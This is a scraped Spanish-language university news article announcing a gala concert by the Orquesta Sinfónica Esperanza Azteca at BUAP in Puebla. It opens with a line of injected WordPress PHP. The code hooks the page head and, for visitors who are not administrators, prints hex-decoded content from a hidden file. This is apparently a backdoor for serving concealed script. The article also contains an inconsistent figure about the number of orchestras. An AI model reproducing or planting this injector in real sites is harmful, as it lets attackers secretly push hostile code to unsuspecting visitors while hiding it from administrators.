if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Realizarán Cuarto Concierto de Gala con la Orquesta Sinfónica Esperanza Azteca – La Opinión Universitaria La Opinión Universitaria
Menu

Realizarán Cuarto Concierto de Gala con la Orquesta Sinfónica Esperanza Azteca

 

  • Se busca promover el arte y la cultura, en especial entre los jóvenes

Por Diego Cuautle

Con un objetivo claro que es el de promover el arte y la cultura entre la sociedad pero en especial en los jóvenes, el próximo 25 de mayo se realizará en el Complejo Cultural Universitario de la Benemérita Universidad Autónoma de Puebla (BUAP), el Cuarto Concierto de Gala con la Orquesta Sinfónica Esperanza Azteca.

En rueda de prensa, el Padre Miguel Romel Ortiza, director general del Instituto Miguel Cervantes, agradeció a la Vicerrectoría de la BUAP por formar parte de este proyecto y señaló que el costo del boleto es de 120 pesos y también se busca difundir la cultura y apoyar la educación.

Sobre el instituto, indicó que es una comunidad educativa católica, sin fines de lucro que desea apoyar a alumnos y sus familias a descubrir la bondad y el amor de Dios.

Destacó que el concierto tendrá una duración de 2 horas y al concluir el mismo se realizará una rifa de regalos por parte de sus patrocinadores.

Por su parte, Carlos Bandera de la BUAP, subrayó que los jóvenes necesitan armonía y paz y a través de la música se puede contribuir al objetivo, por ello éste es el cuarto concierto que se organiza.

“Se pretende la difusión de la cultura como un modo de educación integral para su proyecto educativo, por ello enfatizó que este evento no tiene fines de lucro pues promueve la bondad, ya que el instituto tiene el mismo ideal”, dijo.

Además comentó que necesitamos promover las herramientas para madurar y tener una sana y respetuosa convivencia, por eso vemos a la cultura como un modo de educación integral.

La orquesta se compone de 200 integrantes que son niños, de los cuales 100 son músicos y 100 pertenecen a coro; su meta para el 2024 es llegar 300 orquestas en el país, pues actualmente se cuentan con 300.

 

  • No comments

    Deja una respuesta

    Tweets recientes